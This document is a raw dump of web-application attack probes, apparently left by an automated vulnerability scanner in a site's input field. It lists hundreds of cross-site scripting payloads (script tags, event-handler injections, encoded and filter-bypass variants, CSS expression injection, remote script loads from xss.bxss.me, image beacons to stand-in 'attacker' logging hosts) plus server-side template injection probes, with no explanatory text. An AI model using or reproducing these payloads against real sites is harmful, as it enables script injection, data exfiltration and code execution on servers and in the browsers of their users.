555<img/src=">" onerror=alert(9139)>

555}body{zzz:Expre/**/SSion(fhSZ(9984))}

555&lt

'"()&%<zzz><ScRiPt >50b0(9159)</ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%59%49%58%5A%289366%29%3C%2F%73%43%72%69%70%54%3E

555&lt

555b8PvU <ScRiPt >fhSZ(9096)</ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%57%41%61%76%289108%29%3C%2F%73%43%72%69%70%54%3E

555<aTwsFqv x=9890>

\xf6<img zzz onmouseover=yNox(92871) //\xf6>

5559450372

555\u003CScRiPt\YIXZ(9557)\u003C/sCripT\u003E

\xf6<img zzz onmouseover=Uvh4(95641) //\xf6>

555<img sRc='http://attacker-9462/log.php?

555<input autofocus onfocus=yNox(9132)>

555\u003CScRiPt\WAav(9763)\u003C/sCripT\u003E

555<WHZD7E>5DTVJ[!+!]</WHZD7E>

555<input autofocus onfocus=Uvh4(9816)>

555&lt

555<a9Rgaa2<

555&lt

bfg2350\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2350

<a HrEF=http://xss.bxss.me></a>

<a HrEF=http://xss.bxss.me></a>

bfgx9173\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9173

555'"()&%<zzz><ScRiPt >lR9V(9762)</ScRiPt>

\xf6<img zzz onmouseover=WAav(94201) //\xf6>

555<ifRAme sRc=9211.com></IfRamE>

\xf6<img zzz onmouseover=YIXZ(95011) //\xf6>

<a HrEF=jaVaScRiPT:>

<a HrEF=jaVaScRiPT:>

<%={{={@{#{${dfb}}%>

555<input autofocus onfocus=WAav(9514)>

555<a0e8zLD x=9448>

'"()&%<zzz><ScRiPt >lR9V(9405)</ScRiPt>

555<input autofocus onfocus=YIXZ(9162)>

555}body{zzz:Expre/**/SSion(yNox(9775))}

555

<a HrEF=http://xss.bxss.me></a>

555}body{zzz:Expre/**/SSion(Uvh4(9949))}

5559377559

<a HrEF=http://xss.bxss.me></a>

555<img sRc='http://attacker-9587/log.php?

555BhBmz <ScRiPt >yNox(9967)</ScRiPt>

<a HrEF=jaVaScRiPT:>

<th:t="${dfb}#foreach

bfg6619\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl6619

<a HrEF=jaVaScRiPT:>

555<azmZgQd<

555'"()&%<zzz><ScRiPt >l3j2(9073)</ScRiPt>

555<WPEMZ2>XTCAD[!+!]</WPEMZ2>

555oyzvZ <ScRiPt >Uvh4(9827)</ScRiPt>

555}body{zzz:Expre/**/SSion(WAav(9768))}

555

555}body{zzz:Expre/**/SSion(YIXZ(9468))}

'"()&%<zzz><ScRiPt >l3j2(9484)</ScRiPt>

bfgx5537\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5537

555sliyg <ScRiPt >YIXZ(9301)</ScRiPt>

5555MSc5 <ScRiPt >WAav(9642)</ScRiPt>

555<WTA6PG>KUI2H[!+!]</WTA6PG>

555<ifRAme sRc=9157.com></IfRamE>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

555<WEVTHY>HXDRW[!+!]</WEVTHY>

5559799293

555'"()&%<zzz><ScRiPt >rEzm(9146)</ScRiPt>

555

555<ifRAme sRc=9409.com></IfRamE>

555<am7Ti84 x=9645>

555<WF64BH>9TEAG[!+!]</WF64BH>

555<ifRAme sRc=9275.com></IfRamE>

bfg10550\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl10550

555<ifRAme sRc=9695.com></IfRamE>

555<img sRc='http://attacker-9592/log.php?

555

555<avTceoe x=9990>

dfb{{98991*97996}}xca

'"()&%<zzz><ScRiPt >rEzm(9288)</ScRiPt>

bfgx8963\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8963

555<avfBb3W x=9491>

555<aYtFhTG x=9754>

<%={{={@{#{${dfb}}%>

555<av8GdTM<

<th:t="${dfb}#foreach

dfb[[${98991*97996}]]xca

555<img sRc='http://attacker-9217/log.php?

555<img sRc='http://attacker-9837/log.php?

555<img sRc='http://attacker-9773/log.php?

5559215667

555

<th:t="${dfb}#foreach

555<aQ2HF6j<

555<awSTywY<

bfg3251\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl3251

dfb__${98991*97996}__::.x

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

bfgx6687\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6687

555<ahh0I1u<

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555<ScRiPt >50b0(9941)</ScRiPt>

<%={{={@{#{${dfb}}%>

555

555<WJSX3X>SSV5M[!+!]</WJSX3X>

555

dfb{{98991*97996}}xca

555'"()&%<zzz><ScRiPt >XVEh(9756)</ScRiPt>

<th:t="${dfb}#foreach

555'"()&%<zzz><ScRiPt >29VB(9937)</ScRiPt>

555<script>50b0(9908)</script>

dfb{{98991*97996}}xca

dfb[[${98991*97996}]]xca

'"()&%<zzz><ScRiPt >XVEh(9516)</ScRiPt>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

'"()&%<zzz><ScRiPt >29VB(9857)</ScRiPt>

dfb[[${98991*97996}]]xca

555<script>50b0(9438)</script>9438

dfb__${98991*97996}__::.x

5559115382

555<ScR<ScRiPt>IpT>50b0(9945)</sCr<ScRiPt>IpT>

5559138058

dfb__${98991*97996}__::.x

555

bfg9471\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9471

bfg9174\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9174

555<ScRiPt >50b0(9445)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb{{98991*97996}}xca

bfgx7092\xc0\xbez1\xc0\xbcz2a\x90bcxhjl7092

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9144></ScRiPt>

555<ScRiPt >lR9V(9754)</ScRiPt>

dfb[[${98991*97996}]]xca

bfgx5469\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5469

555'"()&%<zzz><ScRiPt >st22(9875)</ScRiPt>

555<ScRiPt >50b0(9640)</ScRiPt>

<%={{={@{#{${dfb}}%>

555<ScRiPt >l3j2(9014)</ScRiPt>

555'"()&%<zzz><ScRiPt >YurB(9180)</ScRiPt>

dfb__${98991*97996}__::.x

555<WW1DGN>BMOUM[!+!]</WW1DGN>

555<WDF7MS>UJPOL[!+!]</WDF7MS>

555<svg  \xa0onload=50b0(9121)

<%={{={@{#{${dfb}}%>

555

'"()&%<zzz><ScRiPt >YurB(9865)</ScRiPt>

'"()&%<zzz><ScRiPt >st22(9660)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<script>lR9V(9741)</script>

555<isindex type=image src=1 onerror=50b0(9176)>

555<script>l3j2(9098)</script>

<th:t="${dfb}#foreach

555<script>l3j2(9584)</script>9584

555

5559915441

555<script>lR9V(9555)</script>9555

555<ScRiPt >rEzm(9597)</ScRiPt>

555<iframe src='data:text/html

5559414476

555<ScR<ScRiPt>IpT>l3j2(9391)</sCr<ScRiPt>IpT>

555

<th:t="${dfb}#foreach

bfg9229\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9229

bfg7092\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7092

555<ScR<ScRiPt>IpT>lR9V(9818)</sCr<ScRiPt>IpT>

bfgx4511\xc0\xbez1\xc0\xbcz2a\x90bcxhjl4511

555<ScRiPt >l3j2(9806)</ScRiPt>

555<body onload=50b0(9775)>

555<WM0ETL>LCANI[!+!]</WM0ETL>

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

bfgx1458\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1458

555<ScRiPt >lR9V(9959)</ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=50b0(9428)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

<%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9871></ScRiPt>

555<script>rEzm(9515)</script>

555<img src=xyz OnErRor=50b0(9032)>

555

dfb{{98991*97996}}xca

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9126></ScRiPt>

555<script>rEzm(9308)</script>9308

555<ScRiPt >l3j2(9603)</ScRiPt>

dfb[[${98991*97996}]]xca

555<ScRiPt >lR9V(9771)</ScRiPt>

555

555'"()&%<zzz><ScRiPt >iegi(9948)</ScRiPt>

555

555<img/src=">" onerror=alert(9198)>

555'"()&%<zzz><ScRiPt >JdOB(9304)</ScRiPt>

dfb{{98991*97996}}xca

dfb__${98991*97996}__::.x

555<svg  \xa0onload=lR9V(9639)

<th:t="${dfb}#foreach

'"()&%<zzz><ScRiPt >iegi(9031)</ScRiPt>

<th:t="${dfb}#foreach

%35%35%35%3C%53%63%52%69%50%74%20%3E%35%30%62%30%289667%29%3C%2F%73%43%72%69%70%54%3E

555<svg  \xa0onload=l3j2(9541)

'"()&%<zzz><ScRiPt >JdOB(9472)</ScRiPt>

dfb[[${98991*97996}]]xca

555<ScR<ScRiPt>IpT>rEzm(9903)</sCr<ScRiPt>IpT>

555

555'"()&%<zzz><ScRiPt >9933(9969)</ScRiPt>

555'"()&%<zzz><ScRiPt >70Mz(9873)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

5559586865

555

555\u003CScRiPt\50b0(9632)\u003C/sCripT\u003E

dfb__${98991*97996}__::.x

555<isindex type=image src=1 onerror=lR9V(9653)>

555<isindex type=image src=1 onerror=l3j2(9912)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

5559938592

555<ScRiPt >XVEh(9280)</ScRiPt>

'"()&%<zzz><ScRiPt >70Mz(9015)</ScRiPt>

'"()&%<zzz><ScRiPt >9933(9269)</ScRiPt>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555&lt

bfg7235\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7235

555<ScRiPt >rEzm(9095)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

bfg4155\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl4155

5559452860

555<WBIIWW>3NHDI[!+!]</WBIIWW>

555<iframe src='data:text/html

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9780></ScRiPt>

555

555<iframe src='data:text/html

555

\xf6<img zzz onmouseover=50b0(95871) //\xf6>

bfgx5991\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5991

555<script>XVEh(9686)</script>

bfgx7790\xc0\xbez1\xc0\xbcz2a\x90bcxhjl7790

5559998521

555<ScRiPt >29VB(9583)</ScRiPt>

555<body onload=lR9V(9323)>

555<ScRiPt >rEzm(9105)</ScRiPt>

dfb{{98991*97996}}xca

<%={{={@{#{${dfb}}%>

bfg4958\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl4958

555<body onload=l3j2(9330)>

bfg8278\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8278

555<W4MLL7>7HK76[!+!]</W4MLL7>

<%={{={@{#{${dfb}}%>

555<input autofocus onfocus=50b0(9121)>

555<script>XVEh(9529)</script>9529

dfb{{98991*97996}}xca

555<svg  \xa0onload=rEzm(9475)

<th:t="${dfb}#foreach

dfb[[${98991*97996}]]xca

<th:t="${dfb}#foreach

555<img src=//xss.bxss.me/t/dot.gif onload=lR9V(9344)>

555<script>29VB(9871)</script>

bfgx8845\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8845

<a HrEF=http://xss.bxss.me></a>

555<isindex type=image src=1 onerror=rEzm(9581)>

555

bfgx2779\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2779

555<ScR<ScRiPt>IpT>XVEh(9858)</sCr<ScRiPt>IpT>

555<img src=//xss.bxss.me/t/dot.gif onload=l3j2(9688)>

dfb[[${98991*97996}]]xca

555<script>29VB(9667)</script>9667

555

555<img src=xyz OnErRor=lR9V(9179)>

<%={{={@{#{${dfb}}%>

dfb__${98991*97996}__::.x

dfb__${98991*97996}__::.x

555<ScR<ScRiPt>IpT>29VB(9579)</sCr<ScRiPt>IpT>

555<img src=xyz OnErRor=l3j2(9288)>

555<iframe src='data:text/html

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

<a HrEF=jaVaScRiPT:>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555<ScRiPt >29VB(9949)</ScRiPt>

555<ScRiPt >XVEh(9586)</ScRiPt>

555<body onload=rEzm(9948)>

555

555}body{zzz:Expre/**/SSion(50b0(9806))}

555<img/src=">" onerror=alert(9092)>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555

555<img/src=">" onerror=alert(9467)>

555

<th:t="${dfb}#foreach

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9083></ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%6C%33%6A%32%289194%29%3C%2F%73%43%72%69%70%54%3E

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9194></ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=rEzm(9062)>

555k713R <ScRiPt >50b0(9035)</ScRiPt>

555<ScRiPt >st22(9561)</ScRiPt>

555<ScRiPt >YurB(9779)</ScRiPt>

dfb{{98991*97996}}xca

%35%35%35%3C%53%63%52%69%50%74%20%3E%6C%52%39%56%289771%29%3C%2F%73%43%72%69%70%54%3E

<th:t="${dfb}#foreach

555<ScRiPt >29VB(9189)</ScRiPt>

dfb{{98991*97996}}xca

555

555<img src=xyz OnErRor=rEzm(9883)>

555<ScRiPt >XVEh(9903)</ScRiPt>

555<WVK3RL>ELR1G[!+!]</WVK3RL>

555<W9OBJJ>XTPUT[!+!]</W9OBJJ>

555<W9MMUQ>89PD2[!+!]</W9MMUQ>

555\u003CScRiPt\l3j2(9623)\u003C/sCripT\u003E

dfb[[${98991*97996}]]xca

555<img/src=">" onerror=alert(9732)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb[[${98991*97996}]]xca

555

555<ifRAme sRc=9641.com></IfRamE>

555<script>st22(9199)</script>

555<svg  \xa0onload=29VB(9884)

555\u003CScRiPt\lR9V(9940)\u003C/sCripT\u003E

555<svg  \xa0onload=XVEh(9881)

%35%35%35%3C%53%63%52%69%50%74%20%3E%72%45%7A%6D%289887%29%3C%2F%73%43%72%69%70%54%3E

555<script>YurB(9850)</script>

555&lt

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<script>YurB(9189)</script>9189

555<aGmLeY2 x=9495>

dfb__${98991*97996}__::.x

555<script>st22(9441)</script>9441

555&lt

555<isindex type=image src=1 onerror=29VB(9212)>

dfb__${98991*97996}__::.x

\xf6<img zzz onmouseover=l3j2(91061) //\xf6>

555<ScR<ScRiPt>IpT>YurB(9800)</sCr<ScRiPt>IpT>

555<isindex type=image src=1 onerror=XVEh(9643)>

555\u003CScRiPt\rEzm(9237)\u003C/sCripT\u003E

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<ScR<ScRiPt>IpT>st22(9350)</sCr<ScRiPt>IpT>

555<img sRc='http://attacker-9333/log.php?

dfb{{98991*97996}}xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

\xf6<img zzz onmouseover=lR9V(91811) //\xf6>

555<iframe src='data:text/html

555&lt

555<ScRiPt >JdOB(9076)</ScRiPt>

555<input autofocus onfocus=l3j2(9149)>

555<input autofocus onfocus=lR9V(9109)>

555<ScRiPt >st22(9482)</ScRiPt>

555<am7mQSM<

555<iframe src='data:text/html

555<ScRiPt >YurB(9717)</ScRiPt>

555<ScRiPt >iegi(9951)</ScRiPt>

dfb{{98991*97996}}xca

555<WMSUXN>W1VZD[!+!]</WMSUXN>

<a HrEF=http://xss.bxss.me></a>

555<WZVEF0>IJDKK[!+!]</WZVEF0>

dfb[[${98991*97996}]]xca

dfb[[${98991*97996}]]xca

\xf6<img zzz onmouseover=rEzm(97651) //\xf6>

555<body onload=29VB(9910)>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9401></ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9364></ScRiPt>

<a HrEF=jaVaScRiPT:>

555<script>JdOB(9784)</script>

<a HrEF=http://xss.bxss.me></a>

555<body onload=XVEh(9866)>

dfb__${98991*97996}__::.x

555<script>iegi(9771)</script>

dfb__${98991*97996}__::.x

555<img src=//xss.bxss.me/t/dot.gif onload=29VB(9192)>

555<ScRiPt >st22(9383)</ScRiPt>

555}body{zzz:Expre/**/SSion(l3j2(9225))}

555<ScRiPt >YurB(9269)</ScRiPt>

555<script>JdOB(9088)</script>9088

555<input autofocus onfocus=rEzm(9867)>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<img src=//xss.bxss.me/t/dot.gif onload=XVEh(9336)>

555<svg  \xa0onload=st22(9552)

555<script>iegi(9914)</script>9914

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

<a HrEF=jaVaScRiPT:>

555<ScRiPt >70Mz(9793)</ScRiPt>

555<svg  \xa0onload=YurB(9541)

555<img src=xyz OnErRor=29VB(9538)>

555uL28H <ScRiPt >l3j2(9518)</ScRiPt>

555<isindex type=image src=1 onerror=st22(9596)>

555<isindex type=image src=1 onerror=YurB(9449)>

555'"()&%<zzz><ScRiPt >YnxO(9817)</ScRiPt>

555<ScR<ScRiPt>IpT>iegi(9561)</sCr<ScRiPt>IpT>

555}body{zzz:Expre/**/SSion(lR9V(9855))}

555<WHQUUB>TAMM5[!+!]</WHQUUB>

555<img src=xyz OnErRor=XVEh(9142)>

555<ScR<ScRiPt>IpT>JdOB(9312)</sCr<ScRiPt>IpT>

<a HrEF=http://xss.bxss.me></a>

555<img/src=">" onerror=alert(9771)>

555'"()&%<zzz><ScRiPt >gceR(9386)</ScRiPt>

555<iframe src='data:text/html

555<ScRiPt >9933(9338)</ScRiPt>

555<WLPO0H>CM5QK[!+!]</WLPO0H>

<a HrEF=jaVaScRiPT:>

555<ScRiPt >JdOB(9570)</ScRiPt>

555xMcsM <ScRiPt >lR9V(9625)</ScRiPt>

555<script>70Mz(9720)</script>

'"()&%<zzz><ScRiPt >YnxO(9532)</ScRiPt>

555<iframe src='data:text/html

555<ScRiPt >iegi(9980)</ScRiPt>

555<img/src=">" onerror=alert(9703)>

'"()&%<zzz><ScRiPt >gceR(9172)</ScRiPt>

555<body onload=st22(9201)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%32%39%56%42%289248%29%3C%2F%73%43%72%69%70%54%3E

555}body{zzz:Expre/**/SSion(rEzm(9553))}

555<body onload=YurB(9970)>

555<WTFIAS>ZX4NO[!+!]</WTFIAS>

555<ifRAme sRc=9136.com></IfRamE>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9453></ScRiPt>

5559304936

555<WXVM7L>CAB81[!+!]</WXVM7L>

555<script>70Mz(9709)</script>9709

555\u003CScRiPt\29VB(9169)\u003C/sCripT\u003E

555RNpbh <ScRiPt >rEzm(9104)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9122></ScRiPt>

bfg5818\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5818

555<aGlIJ1A x=9077>

%35%35%35%3C%53%63%52%69%50%74%20%3E%58%56%45%68%289659%29%3C%2F%73%43%72%69%70%54%3E

5559753449

555<img src=//xss.bxss.me/t/dot.gif onload=st22(9003)>

555<script>9933(9926)</script>

555<ScRiPt >JdOB(9024)</ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=YurB(9156)>

555<ScR<ScRiPt>IpT>70Mz(9668)</sCr<ScRiPt>IpT>

555<img sRc='http://attacker-9585/log.php?

555<ifRAme sRc=9763.com></IfRamE>

555<ScRiPt >iegi(9352)</ScRiPt>

bfgx2994\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2994

555<WV6800>SRWTE[!+!]</WV6800>

555<script>9933(9937)</script>9937

555<svg  \xa0onload=JdOB(9824)

555<a39hnln<

555<img src=xyz OnErRor=YurB(9107)>

555<img src=xyz OnErRor=st22(9840)>

555\u003CScRiPt\XVEh(9505)\u003C/sCripT\u003E

bfg10756\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl10756

555&lt

555<ScRiPt >70Mz(9690)</ScRiPt>

<%={{={@{#{${dfb}}%>

555<ifRAme sRc=9931.com></IfRamE>

555<svg  \xa0onload=iegi(9075)

555<aQUBmLj x=9469>

555<ScR<ScRiPt>IpT>9933(9516)</sCr<ScRiPt>IpT>

\xf6<img zzz onmouseover=29VB(90931) //\xf6>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9760></ScRiPt>

555&lt

555<img/src=">" onerror=alert(9925)>

bfgx5793\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5793

555<img sRc='http://attacker-9582/log.php?

555<isindex type=image src=1 onerror=JdOB(9128)>

555<img/src=">" onerror=alert(9118)>

<%={{={@{#{${dfb}}%>

555<ScRiPt >70Mz(9326)</ScRiPt>

555

555<isindex type=image src=1 onerror=iegi(9916)>

555<alXQ7YG x=9374>

\xf6<img zzz onmouseover=XVEh(93101) //\xf6>

555<a3kiwHZ<

555

555<ScRiPt >9933(9862)</ScRiPt>

555<input autofocus onfocus=29VB(9835)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%73%74%32%32%289162%29%3C%2F%73%43%72%69%70%54%3E

%35%35%35%3C%53%63%52%69%50%74%20%3E%59%75%72%42%289447%29%3C%2F%73%43%72%69%70%54%3E

<th:t="${dfb}#foreach

555<iframe src='data:text/html

555<img sRc='http://attacker-9661/log.php?

555\u003CScRiPt\YurB(9801)\u003C/sCripT\u003E

<a HrEF=http://xss.bxss.me></a>

555<input autofocus onfocus=XVEh(9681)>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9525></ScRiPt>

555<iframe src='data:text/html

<th:t="${dfb}#foreach

555<svg  \xa0onload=70Mz(9611)

555&lt

555

555\u003CScRiPt\st22(9353)\u003C/sCripT\u003E

555<body onload=JdOB(9145)>

\xf6<img zzz onmouseover=YurB(94521) //\xf6>

555<aZTKvx6<

555<isindex type=image src=1 onerror=70Mz(9991)>

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<img src=//xss.bxss.me/t/dot.gif onload=JdOB(9264)>

<a HrEF=jaVaScRiPT:>

555<ScRiPt >9933(9699)</ScRiPt>

<a HrEF=http://xss.bxss.me></a>

555<body onload=iegi(9923)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555&lt

555<iframe src='data:text/html

555<input autofocus onfocus=YurB(9306)>

555<img src=//xss.bxss.me/t/dot.gif onload=iegi(9380)>

555

555<img src=xyz OnErRor=JdOB(9907)>

<a HrEF=jaVaScRiPT:>

555}body{zzz:Expre/**/SSion(29VB(9526))}

555

555<body onload=70Mz(9918)>

555<svg  \xa0onload=9933(9003)

555GBgIR <ScRiPt >29VB(9063)</ScRiPt>

<a HrEF=http://xss.bxss.me></a>

555<img src=xyz OnErRor=iegi(9791)>

dfb{{98991*97996}}xca

555}body{zzz:Expre/**/SSion(XVEh(9894))}

\xf6<img zzz onmouseover=st22(94531) //\xf6>

555<img/src=">" onerror=alert(9767)>

555<img src=//xss.bxss.me/t/dot.gif onload=70Mz(9971)>

555<isindex type=image src=1 onerror=9933(9983)>

555<WT9NU0>GAKXZ[!+!]</WT9NU0>

555<img/src=">" onerror=alert(9026)>

dfb[[${98991*97996}]]xca

555<input autofocus onfocus=st22(9052)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%4A%64%4F%42%289765%29%3C%2F%73%43%72%69%70%54%3E

555Rhmxz <ScRiPt >XVEh(9568)</ScRiPt>

555<iframe src='data:text/html

<a HrEF=jaVaScRiPT:>

dfb{{98991*97996}}xca

555<ifRAme sRc=9746.com></IfRamE>

<a HrEF=http://xss.bxss.me></a>

dfb__${98991*97996}__::.x

555<img src=xyz OnErRor=70Mz(9037)>

555\u003CScRiPt\JdOB(9768)\u003C/sCripT\u003E

%35%35%35%3C%53%63%52%69%50%74%20%3E%69%65%67%69%289253%29%3C%2F%73%43%72%69%70%54%3E

555<body onload=9933(9029)>

dfb[[${98991*97996}]]xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555}body{zzz:Expre/**/SSion(YurB(9790))}

555<aHigdbg x=9777>

555&lt

<a HrEF=jaVaScRiPT:>

555<WXOEUX>O0QJ8[!+!]</WXOEUX>

555<img src=//xss.bxss.me/t/dot.gif onload=9933(9191)>

555OcAdH <ScRiPt >YurB(9645)</ScRiPt>

555<img sRc='http://attacker-9254/log.php?

dfb__${98991*97996}__::.x

555\u003CScRiPt\iegi(9902)\u003C/sCripT\u003E

555<ScRiPt >gceR(9668)</ScRiPt>

555<img/src=">" onerror=alert(9496)>

555}body{zzz:Expre/**/SSion(st22(9581))}

555<ifRAme sRc=9932.com></IfRamE>

555<img src=xyz OnErRor=9933(9766)>

555'"()&%<zzz><ScRiPt >dFsR(9231)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<WV7NQS>45JW0[!+!]</WV7NQS>

555'"()&%<zzz><ScRiPt >mUeQ(9275)</ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%37%30%4D%7A%289714%29%3C%2F%73%43%72%69%70%54%3E

\xf6<img zzz onmouseover=JdOB(94341) //\xf6>

555<WXO6WX>GBXRP[!+!]</WXO6WX>

555<abcIr0k x=9064>

555<img/src=">" onerror=alert(9351)>

555&lt

'"()&%<zzz><ScRiPt >dFsR(9899)</ScRiPt>

555<script>gceR(9120)</script>

555<ScRiPt >YnxO(9110)</ScRiPt>

555<asA4moU<

555<ifRAme sRc=9371.com></IfRamE>

555\u003CScRiPt\70Mz(9128)\u003C/sCripT\u003E

555CUhpV <ScRiPt >st22(9372)</ScRiPt>

'"()&%<zzz><ScRiPt >mUeQ(9491)</ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%39%39%33%33%289752%29%3C%2F%73%43%72%69%70%54%3E

\xf6<img zzz onmouseover=iegi(90681) //\xf6>

555<script>gceR(9958)</script>9958

555<img sRc='http://attacker-9620/log.php?

555<WCJ3YL>BUEQQ[!+!]</WCJ3YL>

555<input autofocus onfocus=JdOB(9114)>

555&lt

555\u003CScRiPt\9933(9245)\u003C/sCripT\u003E

5559853566

555<input autofocus onfocus=iegi(9967)>

555'"()&%<zzz><ScRiPt >8AFh(9106)</ScRiPt>

555<ScR<ScRiPt>IpT>gceR(9281)</sCr<ScRiPt>IpT>

555<W5YJ3Y>BBNA1[!+!]</W5YJ3Y>

555<script>YnxO(9498)</script>

5559288074

555<acqVPQL<

\xf6<img zzz onmouseover=70Mz(97821) //\xf6>

555<a45i0SS x=9869>

555&lt

<a HrEF=http://xss.bxss.me></a>

bfg2814\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2814

555<input autofocus onfocus=70Mz(9779)>

555<img sRc='http://attacker-9981/log.php?

'"()&%<zzz><ScRiPt >8AFh(9010)</ScRiPt>

555<script>YnxO(9509)</script>9509

<a HrEF=http://xss.bxss.me></a>

555<ScRiPt >gceR(9270)</ScRiPt>

<a HrEF=jaVaScRiPT:>

555'"()&%<zzz><ScRiPt >VtWI(9345)</ScRiPt>

bfgx1322\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1322

555<ScR<ScRiPt>IpT>YnxO(9570)</sCr<ScRiPt>IpT>

bfg5971\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5971

555<ifRAme sRc=9728.com></IfRamE>

\xf6<img zzz onmouseover=9933(94321) //\xf6>

'"()&%<zzz><ScRiPt >VtWI(9847)</ScRiPt>

<a HrEF=http://xss.bxss.me></a>

555<ab3Zg15<

5559989862

555<input autofocus onfocus=9933(9097)>

bfgx4234\xc0\xbez1\xc0\xbcz2a\x90bcxhjl4234

<%={{={@{#{${dfb}}%>

555<ScRiPt >YnxO(9599)</ScRiPt>

<a HrEF=jaVaScRiPT:>

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

5559273273

555<af0aOGw x=9830>

bfg2584\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2584

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9446></ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9720></ScRiPt>

555}body{zzz:Expre/**/SSion(JdOB(9423))}

<%={{={@{#{${dfb}}%>

bfg8838\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8838

555

555}body{zzz:Expre/**/SSion(iegi(9493))}

555<img sRc='http://attacker-9157/log.php?

555}body{zzz:Expre/**/SSion(70Mz(9052))}

555<ScRiPt >gceR(9433)</ScRiPt>

555<ScRiPt >YnxO(9966)</ScRiPt>

555F12e5 <ScRiPt >JdOB(9551)</ScRiPt>

555

<a HrEF=jaVaScRiPT:>

